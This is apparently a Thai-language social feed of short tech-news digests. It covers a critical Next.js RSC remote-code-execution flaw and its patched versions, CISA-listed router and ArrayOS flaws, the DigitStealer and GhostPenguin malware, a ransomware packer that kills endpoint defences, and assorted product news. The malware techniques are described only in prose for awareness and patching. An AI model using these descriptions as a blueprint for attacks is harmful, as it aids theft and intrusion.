Meta เปิดตัวเครื่องมือ AI สำหรับนักข่าว Meta ได้เปิดตัวเครื่องมือ AI ใหม่ที่ออกแบบมาเพื่อช่วยนักข่าวในการค้นหาข้อมูล, ตรวจสอบข้อเท็จจริง และเขียนบทความได้รวดเร็วขึ้น เครื่องมือนี้สามารถวิเคราะห์ข้อมูลจากหลายแหล่งพร้อมกันและสรุปออกมาเป็นประเด็นสำคัญ ทำให้นักข่าวสามารถทำงานได้มีประสิทธิภาพและลดเวลาในการตรวจสอบข่าวปลอม นอกจากนี้ Meta ยังย้ำว่าจะมีระบบตรวจสอบเพื่อป้องกันการใช้ AI ในการสร้างข่าวปลอมเอง ถือเป็นการพยายามสร้างความเชื่อมั่นในวงการสื่อ 🔗 https://securityonline.info/meta-launches-ai-tools-for-journalists 🛡️ ช่องโหว่ร้ายแรงใน D-Link และ Array Networks หน่วยงาน CISA ของสหรัฐฯ ออกประกาศเตือนเกี่ยวกับช่องโหว่ที่ถูกโจมตีจริงในอุปกรณ์เครือข่ายสองค่ายใหญ่ คือเร้าเตอร์รุ่นเก่าของ D-Link และระบบ Array Networks ที่ใช้งานในญี่ปุ่น ช่องโหว่แรกเป็น Buffer Overflow ที่ไม่มีการอัปเดตแก้ไขเพราะอุปกรณ์หมดอายุการสนับสนุนแล้ว ทำให้ผู้ใช้ต้องรีบเปลี่ยนเครื่องใหม่ ส่วนช่องโหว่ที่สองคือการ Inject คำสั่งใน ArrayOS ซึ่งแฮกเกอร์ใช้วาง backdoor และ webshell เพื่อควบคุมระบบจากระยะไกล หน่วยงาน JPCERT ของญี่ปุ่นยืนยันว่ามีการโจมตีจริงตั้งแต่เดือนสิงหาคม และแนะนำให้ผู้ดูแลรีบอัปเดตเป็นเวอร์ชันใหม่หรือปิดฟีเจอร์ Desktop Direct เพื่อป้องกันภัย 🔗 https://securityonline.info/cisa-kev-alert-eol-d-link-and-array-networks-command-injection-under-active-attack ⚙️ Samsung พลิกฟื้นโรงงานผลิตชิป 4nm หลังจากเจอปัญหาผลิตชิปไม่คงที่จนเสียลูกค้ารายใหญ่ไป Samsung Foundry เริ่มกลับมามีความหวังอีกครั้ง เมื่อสามารถยกระดับอัตราการผลิตชิป 4nm ให้ได้ผลสำเร็จถึง 60–70% และคว้าออเดอร์ใหญ่จากสตาร์ทอัพ AI สัญชาติอเมริกัน Tsavorite มูลค่ากว่า 100 ล้านดอลลาร์ สัญญานี้ถือเป็นหมุดหมายสำคัญที่ช่วยสร้างความเชื่อมั่นว่าซัมซุงยังมีศักยภาพแข่งขันกับ TSMC ได้ นอกจากนี้ยังมีการพัฒนาเทคโนโลยี 2nm ที่เตรียมใช้ในสมาร์ทโฟนรุ่นใหม่ Galaxy S26 อีกด้วย 🔗 https://securityonline.info/samsung-foundry-hits-60-4nm-yield-secures-100m-ai-chip-order-from-tsavorite 📱 โค้ดโฆษณาในแอป ChatGPT Android จุดกระแสถกเถียง นักพัฒนาพบโค้ดที่ดูเหมือนระบบโฆษณาในแอป ChatGPT เวอร์ชันทดสอบบน Android ทำให้เกิดการคาดเดาว่า OpenAI อาจเตรียมใส่โฆษณาในบริการ แต่ผู้จัดการผลิตภัณฑ์ของ OpenAI รีบออกมาปฏิเสธทันทีว่าบริษัทไม่ได้ทดสอบฟีเจอร์โฆษณาในตอนนี้ อย่างไรก็ตามก็ไม่ได้ปิดโอกาสในอนาคต โดยย้ำว่าหากมีการนำโฆษณามาใช้จริง จะทำด้วยความระมัดระวังเพื่อรักษาความเชื่อมั่นของผู้ใช้ เนื่องจาก ChatGPT มีผู้ใช้งานมหาศาลกว่า 800 ล้านคนต่อสัปดาห์ 🔗 https://securityonline.info/ad-code-found-in-chatgpt-android-build-openai-denies-current-advertising-tests 🐧 AI จับได้ GhostPenguin มัลแวร์ลินุกซ์สุดลึกลับ นักวิจัยจาก Trend Micro ใช้ระบบ AI ตรวจจับพบมัลแวร์ใหม่ชื่อ GhostPenguin ที่ซ่อนตัวอยู่ในระบบลินุกซ์โดยไม่ถูกตรวจจับนานหลายเดือน มัลแวร์นี้เขียนด้วย C++ มีความสามารถสูงในการควบคุมเครื่องจากระยะไกลผ่านการสื่อสารแบบ UDP ที่เข้ารหัสด้วย RC5 ทำให้ยากต่อการตรวจสอบ จุดเด่นคือการทำงานแบบหลายเธรด ทำให้มัลแวร์ยังคงตอบสนองแม้บางส่วนของโค้ดหยุดทำงาน การค้นพบนี้ตอกย้ำว่าการใช้ AI ในการล่ามัลแวร์เป็นสิ่งจำเป็นในยุคที่ภัยไซเบอร์ซับซ้อนขึ้นเรื่อยๆ 🔗 https://securityonline.info/ai-uncovers-ghostpenguin-undetectable-linux-backdoor-used-rc5-encrypted-udp-for-covert-c2 💻 Shanya Crypter เครื่องมือใหม่ของแก๊งแรนซัมแวร์ Sophos รายงานการพบเครื่องมือใหม่ชื่อ Shanya Crypter ซึ่งเป็นบริการ “packer-as-a-service” ที่ช่วยให้กลุ่มแรนซัมแวร์สามารถหลบเลี่ยงการตรวจจับได้อย่างมีประสิทธิภาพ เครื่องมือนี้ใช้เทคนิคซับซ้อน เช่น การซ่อนโค้ดใน DLL ของระบบ Windows และการใช้ driver ที่มีช่องโหว่เพื่อฆ่าโปรแกรมป้องกัน (EDR Killer) ก่อนปล่อยแรนซัมแวร์เข้ามาโจมตี ทำให้การป้องกันยากขึ้นมาก กลุ่ม Akira, Medusa และ Qilin ถูกระบุว่าเป็นผู้ใช้งานหลักของเครื่องมือนี้ และมีการแพร่กระจายไปหลายประเทศแล้ว 🔗 https://securityonline.info/shanya-crypter-is-the-new-ransomware-toolkit-uses-kernel-driver-abuse-to-kill-edr 🌐 Microsoft เปิดตัว Copilot+ PC ไมโครซอฟท์ประกาศเปิดตัวคอมพิวเตอร์รุ่นใหม่ที่เรียกว่า Copilot+ PC ซึ่งมาพร้อมชิป Snapdragon X Elite และ X Plus ที่ออกแบบมาเพื่อรองรับงาน AI โดยเฉพาะ จุดเด่นคือความสามารถในการทำงานแบบ “AI on-device” เช่น ฟีเจอร์ Recall ที่ช่วยค้นหาสิ่งที่เคยทำบนเครื่องได้เหมือนย้อนเวลา และการใช้ Copilot ในการสร้างภาพหรือข้อความได้ทันทีโดยไม่ต้องพึ่งคลาวด์ ถือเป็นการยกระดับ Windows ให้เข้าสู่ยุคใหม่ที่ AI กลายเป็นส่วนหนึ่งของการใช้งานประจำวัน 🔗 https://securityonline.info/microsoft-unveils-copilot-pc-powered-by-snapdragon-x-elite-and-x-plus 🧬 Google DeepMind เปิดตัว AlphaFold 3 DeepMind เปิดตัว AlphaFold 3 ซึ่งเป็นเวอร์ชันใหม่ของโมเดล AI ที่ใช้ทำนายโครงสร้างโมเลกุลและปฏิสัมพันธ์ทางชีววิทยาได้แม่นยำยิ่งขึ้น จากเดิมที่ AlphaFold 2 สร้างความฮือฮาในการทำนายโครงสร้างโปรตีน ตอนนี้ AlphaFold 3 ก้าวไปอีกขั้นด้วยการจำลองการทำงานของ DNA, RNA และโมเลกุลขนาดเล็กที่ซับซ้อนมากขึ้น นักวิทยาศาสตร์เชื่อว่าจะช่วยเร่งการค้นคว้ายาใหม่และการวิจัยทางการแพทย์ได้อย่างมหาศาล 🔗 https://securityonline.info/google-deepmind-launches-alphafold-3-ai-model-for-molecular-science 🚀 SpaceX ส่งดาวเทียม Starlink รุ่นใหม่ SpaceX ประสบความสำเร็จในการปล่อยดาวเทียม Starlink รุ่นใหม่ที่มีประสิทธิภาพสูงขึ้นและรองรับการเชื่อมต่ออินเทอร์เน็ตที่เร็วกว่าเดิม ดาวเทียมรุ่นนี้ถูกออกแบบให้มีอายุการใช้งานยาวนานขึ้นและสามารถให้บริการในพื้นที่ห่างไกลได้ดีกว่าเดิม การปล่อยครั้งนี้ยังตอกย้ำความตั้งใจของ SpaceX ที่จะขยายเครือข่ายอินเทอร์เน็ตทั่วโลกให้ครอบคลุมทุกพื้นที่ 🔗 https://securityonline.info/spacex-launches-next-gen-starlink-satellites-for-faster-global-internet 🎮 Sony เปิดตัว PlayStation 5 Pro Sony เปิดตัวเครื่องเล่นเกม PlayStation 5 Pro ที่มาพร้อมประสิทธิภาพกราฟิกสูงขึ้น รองรับการเล่นเกม 8K และมีระบบ Ray Tracing ที่สมจริงกว่าเดิม จุดขายคือการใช้ชิปใหม่ที่ทำให้เฟรมเรตเสถียรขึ้นแม้ในเกมที่ใช้กราฟิกหนักๆ นักวิเคราะห์เชื่อว่า PS5 Pro จะช่วยดึงดูดนักเล่นเกมที่ต้องการประสบการณ์ภาพสมจริงและเป็นการต่อยอดความสำเร็จของ PS5 รุ่นปัจจุบัน 🔗 https://securityonline.info/sony-unveils-playstation-5-pro-with-8k-gaming-and-ray-tracing 🏥 WHO เตือนการระบาดของโรคใหม่ องค์การอนามัยโลก (WHO) ออกประกาศเตือนเกี่ยวกับการระบาดของโรคใหม่ที่มีลักษณะคล้ายไข้หวัดใหญ่แต่แพร่กระจายเร็วกว่า โดยพบผู้ติดเชื้อในหลายประเทศแล้ว และกำลังเร่งตรวจสอบสายพันธุ์เพื่อหาวิธีควบคุมการแพร่ระบาด WHO แนะนำให้ประเทศต่างๆ เตรียมมาตรการรับมือและเพิ่มการตรวจสอบในสนามบินและด่านชายแดนเพื่อป้องกันการแพร่กระจาย ​​​​​​​🔗 https://securityonline.info/who-issues-warning-on-new-fast-spreading-flu-like-disease
    0 Comments 0 Shares 955 Views 0 Reviews
  • ช่องโหว่ Next.js ระดับวิกฤติ

    นักพัฒนาที่ใช้ Next.js ร่วมกับ React Server Components (RSC) กำลังเผชิญสถานการณ์อันตราย เนื่องจากมีการค้นพบช่องโหว่ที่เปิดโอกาสให้ผู้โจมตีสามารถส่งคำสั่งไปประมวลผลบนเซิร์ฟเวอร์โดยตรง ช่องโหว่นี้ถูกจัดอยู่ในระดับ CVSS 10.0 ซึ่งเป็นคะแนนสูงสุด หมายถึงความเสี่ยงต่อการถูกยึดครองระบบทั้งหมด

    สาเหตุของปัญหา
    ปัญหานี้เกิดจากการที่ RSC Protocol ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเข้มงวด ทำให้ผู้โจมตีสามารถสร้างคำขอที่บังคับให้เซิร์ฟเวอร์ทำงานตามเส้นทางที่ไม่ได้ตั้งใจไว้ ส่งผลให้เกิดการ Remote Code Execution (RCE) โดยตรง ซึ่งถือเป็นหนึ่งในช่องโหว่ที่อันตรายที่สุดในโลกเว็บแอปพลิเคชัน

    เวอร์ชันที่ได้รับผลกระทบ
    Next.js 15.x และ 16.x
    Next.js 14.3.0-canary.77 และเวอร์ชัน canary ที่ใหม่กว่า

    ในขณะที่ Next.js 13.x, 14.x stable, Pages Router และ Edge Runtime ไม่ได้รับผลกระทบ

    แนวทางแก้ไข
    ไม่มีวิธีการตั้งค่าหรือ workaround ที่สามารถปิดช่องโหว่นี้ได้ ผู้พัฒนาจึงต้อง อัปเดตทันที ไปยังเวอร์ชันที่ได้รับการแก้ไข ได้แก่:
    Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7
    Next.js 16.0.7

    สำหรับผู้ที่ใช้เวอร์ชัน 14 Canary ควร downgrade กลับไปยังเวอร์ชัน stable ล่าสุดเพื่อความปลอดภัย

    สรุปประเด็นสำคัญ
    ข้อมูลจากข่าว
    ช่องโหว่ CVE-2025-66478 มีคะแนน CVSS 10.0
    เกิดจาก React Server Components (RSC) Protocol ที่ไม่ตรวจสอบข้อมูลเข้มงวด
    ส่งผลให้เกิด Remote Code Execution (RCE) ได้ทันที
    เวอร์ชันที่ได้รับผลกระทบคือ Next.js 15.x, 16.x และ 14.3.0-canary.77+
    เวอร์ชันที่ปลอดภัยคือ Next.js 13.x, 14.x stable, Pages Router และ Edge Runtime

    คำเตือนจากข่าว
    ไม่มี workaround หรือการตั้งค่าที่ช่วยแก้ไขได้
    หากไม่อัปเดตทันที ระบบเสี่ยงต่อการถูกยึดครองเต็มรูปแบบ
    ผู้ใช้ Next.js Canary ต้อง downgrade เพื่อหลีกเลี่ยงความเสี่ยง
    การละเลยการอัปเดตอาจทำให้ข้อมูลและระบบถูกโจมตีโดยตรง

    https://securityonline.info/maximum-severity-alert-critical-rce-flaw-hits-next-js-cve-2025-66478-cvss-10-0/
    ⚠️ ช่องโหว่ Next.js ระดับวิกฤติ นักพัฒนาที่ใช้ Next.js ร่วมกับ React Server Components (RSC) กำลังเผชิญสถานการณ์อันตราย เนื่องจากมีการค้นพบช่องโหว่ที่เปิดโอกาสให้ผู้โจมตีสามารถส่งคำสั่งไปประมวลผลบนเซิร์ฟเวอร์โดยตรง ช่องโหว่นี้ถูกจัดอยู่ในระดับ CVSS 10.0 ซึ่งเป็นคะแนนสูงสุด หมายถึงความเสี่ยงต่อการถูกยึดครองระบบทั้งหมด 🧩 สาเหตุของปัญหา ปัญหานี้เกิดจากการที่ RSC Protocol ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเข้มงวด ทำให้ผู้โจมตีสามารถสร้างคำขอที่บังคับให้เซิร์ฟเวอร์ทำงานตามเส้นทางที่ไม่ได้ตั้งใจไว้ ส่งผลให้เกิดการ Remote Code Execution (RCE) โดยตรง ซึ่งถือเป็นหนึ่งในช่องโหว่ที่อันตรายที่สุดในโลกเว็บแอปพลิเคชัน 🔎 เวอร์ชันที่ได้รับผลกระทบ 🐞 Next.js 15.x และ 16.x 🐞 Next.js 14.3.0-canary.77 และเวอร์ชัน canary ที่ใหม่กว่า ในขณะที่ Next.js 13.x, 14.x stable, Pages Router และ Edge Runtime ไม่ได้รับผลกระทบ 🛡️ แนวทางแก้ไข ไม่มีวิธีการตั้งค่าหรือ workaround ที่สามารถปิดช่องโหว่นี้ได้ ผู้พัฒนาจึงต้อง อัปเดตทันที ไปยังเวอร์ชันที่ได้รับการแก้ไข ได้แก่: 🪛 Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7 🪛 Next.js 16.0.7 สำหรับผู้ที่ใช้เวอร์ชัน 14 Canary ควร downgrade กลับไปยังเวอร์ชัน stable ล่าสุดเพื่อความปลอดภัย 📌 สรุปประเด็นสำคัญ ✅ ข้อมูลจากข่าว ➡️ ช่องโหว่ CVE-2025-66478 มีคะแนน CVSS 10.0 ➡️ เกิดจาก React Server Components (RSC) Protocol ที่ไม่ตรวจสอบข้อมูลเข้มงวด ➡️ ส่งผลให้เกิด Remote Code Execution (RCE) ได้ทันที ➡️ เวอร์ชันที่ได้รับผลกระทบคือ Next.js 15.x, 16.x และ 14.3.0-canary.77+ ➡️ เวอร์ชันที่ปลอดภัยคือ Next.js 13.x, 14.x stable, Pages Router และ Edge Runtime ‼️ คำเตือนจากข่าว ⛔ ไม่มี workaround หรือการตั้งค่าที่ช่วยแก้ไขได้ ⛔ หากไม่อัปเดตทันที ระบบเสี่ยงต่อการถูกยึดครองเต็มรูปแบบ ⛔ ผู้ใช้ Next.js Canary ต้อง downgrade เพื่อหลีกเลี่ยงความเสี่ยง ⛔ การละเลยการอัปเดตอาจทำให้ข้อมูลและระบบถูกโจมตีโดยตรง https://securityonline.info/maximum-severity-alert-critical-rce-flaw-hits-next-js-cve-2025-66478-cvss-10-0/
    SECURITYONLINE.INFO
    Maximum Severity Alert: Critical RCE Flaw Hits Next.js (CVE-2025-66478, CVSS 10.0)
    Developers using the modern stack of Next.js and React are facing a “red alert” situation today. A maximum-severity
    0 Comments 0 Shares 161 Views 0 Reviews
  • 5 วิธีใหม่ในการใช้ iPad รุ่นเก่าให้เกิดประโยชน์
    แม้ว่า iPad รุ่นใหม่จะมีประสิทธิภาพสูงและระบบ iPadOS ที่ทันสมัย แต่ iPad รุ่นเก่าก็ยังสามารถนำมาใช้งานได้อย่างคุ้มค่า โดย SlashGear ได้แนะนำ 5 วิธีใหม่ ที่ช่วยยืดอายุการใช้งานของอุปกรณ์และลดการสร้างขยะอิเล็กทรอนิกส์

    หนึ่งในวิธีที่น่าสนใจคือการใช้ iPad เป็น เมนูร้านอาหารหรือเครื่องคิดเงิน (POS) เพราะหน้าจอสามารถแสดงเมนูอาหารได้ชัดเจนและปรับเปลี่ยนได้ง่าย อีกทั้งยังรองรับแอปพลิเคชัน POS ที่ช่วยให้ร้านค้าประหยัดค่าใช้จ่ายในการซื้อเครื่องคิดเงินแบบดั้งเดิม

    อีกทางเลือกคือการใช้ iPad เป็น คอมพิวเตอร์สำรอง โดยเฉพาะรุ่นที่รองรับ iPadOS 26 ซึ่งมีฟีเจอร์ใกล้เคียงกับ MacBook เช่น การจัดการไฟล์และการทำงานแบบหลายหน้าต่าง ทำให้สามารถใช้แทนโน้ตบุ๊คได้ในกรณีฉุกเฉิน

    สำหรับผู้ที่ชอบปรับแต่งอุปกรณ์ iPad รุ่นเก่าสามารถ เจลเบรก (Jailbreak) เพื่อปลดล็อกข้อจำกัดของระบบ และติดตั้งแอปหรือฟีเจอร์ที่ Apple ไม่อนุญาต อย่างไรก็ตาม การเจลเบรกมีความเสี่ยงสูงและอาจทำให้หมดประกัน

    นอกจากนี้ยังสามารถใช้ iPad เป็น เครื่องช่วยออกกำลังกาย โดยเชื่อมต่อกับ Apple Fitness+ หรือใช้เป็นหน้าจอสำหรับดูวิดีโอการออกกำลังกาย และสุดท้ายคือการใช้เป็น เทเลพรอมพ์เตอร์ สำหรับการบันทึกวิดีโอหรือการพูดในงานต่าง ๆ ซึ่งมีแอปฟรีรองรับการใช้งานได้ทันที

    สรุปประเด็นสำคัญ
    รายการสิ่งที่ทำได้กับ iPad รุ่นเก่า
    เมนูร้านอาหาร / เครื่องคิดเงิน POS
    ใช้แสดงเมนูอาหารและเครื่องดื่ม
    รองรับแอป POS สำหรับการชำระเงิน

    คอมพิวเตอร์สำรองแทนโน้ตบุ๊ค
    ใช้ iPadOS 26 ที่รองรับ multitasking และจัดการไฟล์
    เหมาะสำหรับพกพาไปทำงานนอกสถานที่

    เจลเบรก (Jailbreak) เพื่อปลดล็อกข้อจำกัด
    ติดตั้งแอปนอกระบบและปรับแต่งได้มากขึ้น
    ใช้เครื่องมืออย่าง palera1n สำหรับรุ่นที่รองรับ

    เครื่องช่วยออกกำลังกาย
    ใช้กับ Apple Fitness+ หรือวิดีโอออกกำลังกาย
    หน้าจอใหญ่และเสียงดังชัดเจนกว่ามือถือ

    เทเลพรอมพ์เตอร์ (Teleprompter)
    ใช้แอป Teleprompter หรือ Presenter Mode ใน Pages
    เหมาะสำหรับการบันทึกวิดีโอหรือการพูดในงานต่าง ๆ

    คำเตือนและข้อควรพิจารณา
    แบตเตอรี่เสื่อมสภาพอาจทำให้ใช้งานต่อเนื่องได้ไม่นาน

    https://www.slashgear.com/2026270/more-things-you-can-do-with-old-ipad/
    📱5 วิธีใหม่ในการใช้ iPad รุ่นเก่าให้เกิดประโยชน์ แม้ว่า iPad รุ่นใหม่จะมีประสิทธิภาพสูงและระบบ iPadOS ที่ทันสมัย แต่ iPad รุ่นเก่าก็ยังสามารถนำมาใช้งานได้อย่างคุ้มค่า โดย SlashGear ได้แนะนำ 5 วิธีใหม่ ที่ช่วยยืดอายุการใช้งานของอุปกรณ์และลดการสร้างขยะอิเล็กทรอนิกส์ หนึ่งในวิธีที่น่าสนใจคือการใช้ iPad เป็น เมนูร้านอาหารหรือเครื่องคิดเงิน (POS) เพราะหน้าจอสามารถแสดงเมนูอาหารได้ชัดเจนและปรับเปลี่ยนได้ง่าย อีกทั้งยังรองรับแอปพลิเคชัน POS ที่ช่วยให้ร้านค้าประหยัดค่าใช้จ่ายในการซื้อเครื่องคิดเงินแบบดั้งเดิม อีกทางเลือกคือการใช้ iPad เป็น คอมพิวเตอร์สำรอง โดยเฉพาะรุ่นที่รองรับ iPadOS 26 ซึ่งมีฟีเจอร์ใกล้เคียงกับ MacBook เช่น การจัดการไฟล์และการทำงานแบบหลายหน้าต่าง ทำให้สามารถใช้แทนโน้ตบุ๊คได้ในกรณีฉุกเฉิน สำหรับผู้ที่ชอบปรับแต่งอุปกรณ์ iPad รุ่นเก่าสามารถ เจลเบรก (Jailbreak) เพื่อปลดล็อกข้อจำกัดของระบบ และติดตั้งแอปหรือฟีเจอร์ที่ Apple ไม่อนุญาต อย่างไรก็ตาม การเจลเบรกมีความเสี่ยงสูงและอาจทำให้หมดประกัน นอกจากนี้ยังสามารถใช้ iPad เป็น เครื่องช่วยออกกำลังกาย โดยเชื่อมต่อกับ Apple Fitness+ หรือใช้เป็นหน้าจอสำหรับดูวิดีโอการออกกำลังกาย และสุดท้ายคือการใช้เป็น เทเลพรอมพ์เตอร์ สำหรับการบันทึกวิดีโอหรือการพูดในงานต่าง ๆ ซึ่งมีแอปฟรีรองรับการใช้งานได้ทันที 📌 สรุปประเด็นสำคัญ 📋 รายการสิ่งที่ทำได้กับ iPad รุ่นเก่า ✅ เมนูร้านอาหาร / เครื่องคิดเงิน POS ➡️ ใช้แสดงเมนูอาหารและเครื่องดื่ม ➡️ รองรับแอป POS สำหรับการชำระเงิน ✅ คอมพิวเตอร์สำรองแทนโน้ตบุ๊ค ➡️ ใช้ iPadOS 26 ที่รองรับ multitasking และจัดการไฟล์ ➡️ เหมาะสำหรับพกพาไปทำงานนอกสถานที่ ✅ เจลเบรก (Jailbreak) เพื่อปลดล็อกข้อจำกัด ➡️ ติดตั้งแอปนอกระบบและปรับแต่งได้มากขึ้น ➡️ ใช้เครื่องมืออย่าง palera1n สำหรับรุ่นที่รองรับ ✅ เครื่องช่วยออกกำลังกาย ➡️ ใช้กับ Apple Fitness+ หรือวิดีโอออกกำลังกาย ➡️ หน้าจอใหญ่และเสียงดังชัดเจนกว่ามือถือ ✅ เทเลพรอมพ์เตอร์ (Teleprompter) ➡️ ใช้แอป Teleprompter หรือ Presenter Mode ใน Pages ➡️ เหมาะสำหรับการบันทึกวิดีโอหรือการพูดในงานต่าง ๆ ‼️ คำเตือนและข้อควรพิจารณา ⛔ แบตเตอรี่เสื่อมสภาพอาจทำให้ใช้งานต่อเนื่องได้ไม่นาน https://www.slashgear.com/2026270/more-things-you-can-do-with-old-ipad/
    WWW.SLASHGEAR.COM
    5 More Things You Can Do With Your Old iPad Instead Of Throwing It Away - SlashGear
    Old iPad gathering dust? Here’s how to turn it into a menu, teleprompter, workout screen, backup computer or more without spending much.
    0 Comments 0 Shares 321 Views 0 Reviews
  • มัลแวร์ใหม่ DigitStealer โจมตี Mac รุ่น M2+

    Jamf Threat Labs เปิดเผยการค้นพบมัลแวร์ใหม่ชื่อ DigitStealer ที่ถูกออกแบบมาเพื่อเจาะระบบ macOS โดยเฉพาะรุ่นที่ใช้ชิป Apple Silicon M2 หรือใหม่กว่า จุดเด่นคือการใช้เทคนิคขั้นสูง เช่น multi-stage payload, JXA (JavaScript for Automation) และการซ่อนตัวผ่าน Cloudflare Pages เพื่อหลบเลี่ยงการตรวจจับ

    เป้าหมายหลัก: กระเป๋าเงินคริปโต Ledger Live
    หนึ่งในเป้าหมายสำคัญของ DigitStealer คือการแก้ไขและเปลี่ยนการตั้งค่าในแอป Ledger Live เพื่อส่งข้อมูล seed phrase และการตั้งค่ากระเป๋าเงินไปยังเซิร์ฟเวอร์ของผู้โจมตี มัลแวร์นี้ยังสามารถเข้าถึงข้อมูลจาก Electrum, Exodus, Coinomi และแม้แต่ macOS Keychain, VPN, Telegram ได้อีกด้วย

    เทคนิคการโจมตีที่ซับซ้อน
    DigitStealer ใช้การตรวจสอบฮาร์ดแวร์และ locale เพื่อตัดสินใจว่าจะทำงานหรือไม่ โดยมันจะไม่ทำงานบน VM, Intel Macs หรือแม้แต่ M1 Macs แต่จะทำงานเฉพาะบน M2 ขึ้นไป นอกจากนี้ยังใช้ AppleScript เพื่อหลอกให้ผู้ใช้กรอกรหัสผ่าน macOS และเก็บข้อมูล credential พร้อมทั้งสร้าง Launch Agent ที่ดึง payload จาก DNS TXT record เพื่อสร้าง backdoor ที่ทำงานต่อเนื่อง

    ความเสี่ยงและบทเรียน
    เหตุการณ์นี้สะท้อนให้เห็นว่าแม้ macOS จะถูกมองว่าปลอดภัย แต่ผู้โจมตีก็พัฒนาเทคนิคใหม่ๆ ที่เจาะจงไปยังสถาปัตยกรรมล่าสุดของ Apple ได้โดยตรง ผู้ใช้ที่เกี่ยวข้องกับคริปโตหรือข้อมูลสำคัญควรระวังเป็นพิเศษ และองค์กรควรเตรียมระบบตรวจจับภัยคุกคามที่ทันสมัยเพื่อรับมือกับมัลแวร์ที่ซับซ้อนเช่นนี้

    สรุปสาระสำคัญ
    การค้นพบมัลแวร์ DigitStealer
    เจาะระบบ macOS M2+ โดยใช้ JXA และ Cloudflare Pages
    ใช้ multi-stage payload เพื่อหลบเลี่ยงการตรวจจับ

    เป้าหมายการโจมตี
    มุ่งเป้าไปที่กระเป๋าเงินคริปโต Ledger Live
    สามารถเข้าถึงข้อมูลจาก Keychain, VPN, Telegram และ browser

    เทคนิคที่ใช้
    ตรวจสอบ locale และฮาร์ดแวร์เพื่อเลือกเป้าหมาย
    ใช้ AppleScript หลอกขอรหัสผ่าน macOS
    สร้าง Launch Agent ที่ดึง payload จาก DNS TXT record

    คำเตือนจากเหตุการณ์
    macOS ไม่ได้ปลอดภัยสมบูรณ์ ผู้โจมตีเริ่มเจาะจงรุ่นใหม่โดยตรง
    ผู้ใช้คริปโตควรระวังเป็นพิเศษ เนื่องจาก seed phrase อาจถูกขโมย
    องค์กรควรมีระบบตรวจจับภัยคุกคามที่ทันสมัยและแผนรับมือมัลแวร์ขั้นสูง

    https://securityonline.info/advanced-macos-digitstealer-targets-m2-macs-hijacking-ledger-live-via-jxa-and-dns-based-c2/
    🖥️ มัลแวร์ใหม่ DigitStealer โจมตี Mac รุ่น M2+ Jamf Threat Labs เปิดเผยการค้นพบมัลแวร์ใหม่ชื่อ DigitStealer ที่ถูกออกแบบมาเพื่อเจาะระบบ macOS โดยเฉพาะรุ่นที่ใช้ชิป Apple Silicon M2 หรือใหม่กว่า จุดเด่นคือการใช้เทคนิคขั้นสูง เช่น multi-stage payload, JXA (JavaScript for Automation) และการซ่อนตัวผ่าน Cloudflare Pages เพื่อหลบเลี่ยงการตรวจจับ 🔑 เป้าหมายหลัก: กระเป๋าเงินคริปโต Ledger Live หนึ่งในเป้าหมายสำคัญของ DigitStealer คือการแก้ไขและเปลี่ยนการตั้งค่าในแอป Ledger Live เพื่อส่งข้อมูล seed phrase และการตั้งค่ากระเป๋าเงินไปยังเซิร์ฟเวอร์ของผู้โจมตี มัลแวร์นี้ยังสามารถเข้าถึงข้อมูลจาก Electrum, Exodus, Coinomi และแม้แต่ macOS Keychain, VPN, Telegram ได้อีกด้วย 🛡️ เทคนิคการโจมตีที่ซับซ้อน DigitStealer ใช้การตรวจสอบฮาร์ดแวร์และ locale เพื่อตัดสินใจว่าจะทำงานหรือไม่ โดยมันจะไม่ทำงานบน VM, Intel Macs หรือแม้แต่ M1 Macs แต่จะทำงานเฉพาะบน M2 ขึ้นไป นอกจากนี้ยังใช้ AppleScript เพื่อหลอกให้ผู้ใช้กรอกรหัสผ่าน macOS และเก็บข้อมูล credential พร้อมทั้งสร้าง Launch Agent ที่ดึง payload จาก DNS TXT record เพื่อสร้าง backdoor ที่ทำงานต่อเนื่อง ⚠️ ความเสี่ยงและบทเรียน เหตุการณ์นี้สะท้อนให้เห็นว่าแม้ macOS จะถูกมองว่าปลอดภัย แต่ผู้โจมตีก็พัฒนาเทคนิคใหม่ๆ ที่เจาะจงไปยังสถาปัตยกรรมล่าสุดของ Apple ได้โดยตรง ผู้ใช้ที่เกี่ยวข้องกับคริปโตหรือข้อมูลสำคัญควรระวังเป็นพิเศษ และองค์กรควรเตรียมระบบตรวจจับภัยคุกคามที่ทันสมัยเพื่อรับมือกับมัลแวร์ที่ซับซ้อนเช่นนี้ 📌 สรุปสาระสำคัญ ✅ การค้นพบมัลแวร์ DigitStealer ➡️ เจาะระบบ macOS M2+ โดยใช้ JXA และ Cloudflare Pages ➡️ ใช้ multi-stage payload เพื่อหลบเลี่ยงการตรวจจับ ✅ เป้าหมายการโจมตี ➡️ มุ่งเป้าไปที่กระเป๋าเงินคริปโต Ledger Live ➡️ สามารถเข้าถึงข้อมูลจาก Keychain, VPN, Telegram และ browser ✅ เทคนิคที่ใช้ ➡️ ตรวจสอบ locale และฮาร์ดแวร์เพื่อเลือกเป้าหมาย ➡️ ใช้ AppleScript หลอกขอรหัสผ่าน macOS ➡️ สร้าง Launch Agent ที่ดึง payload จาก DNS TXT record ‼️ คำเตือนจากเหตุการณ์ ⛔ macOS ไม่ได้ปลอดภัยสมบูรณ์ ผู้โจมตีเริ่มเจาะจงรุ่นใหม่โดยตรง ⛔ ผู้ใช้คริปโตควรระวังเป็นพิเศษ เนื่องจาก seed phrase อาจถูกขโมย ⛔ องค์กรควรมีระบบตรวจจับภัยคุกคามที่ทันสมัยและแผนรับมือมัลแวร์ขั้นสูง https://securityonline.info/advanced-macos-digitstealer-targets-m2-macs-hijacking-ledger-live-via-jxa-and-dns-based-c2/
    SECURITYONLINE.INFO
    Advanced macOS DigitStealer Targets M2+ Macs, Hijacking Ledger Live via JXA and DNS-Based C2
    Jamf exposed DigitStealer, an advanced macOS infostealer that checks for Apple M2+ chips. It uses Cloudflare Pages for delivery, JXA for stealth, and modifies Ledger Live to steal crypto wallets via DNS TXT C2.
    0 Comments 0 Shares 230 Views 0 Reviews
  • KDE Frameworks 6.20 เพิ่มแอนิเมชันใหม่ใน System Settings

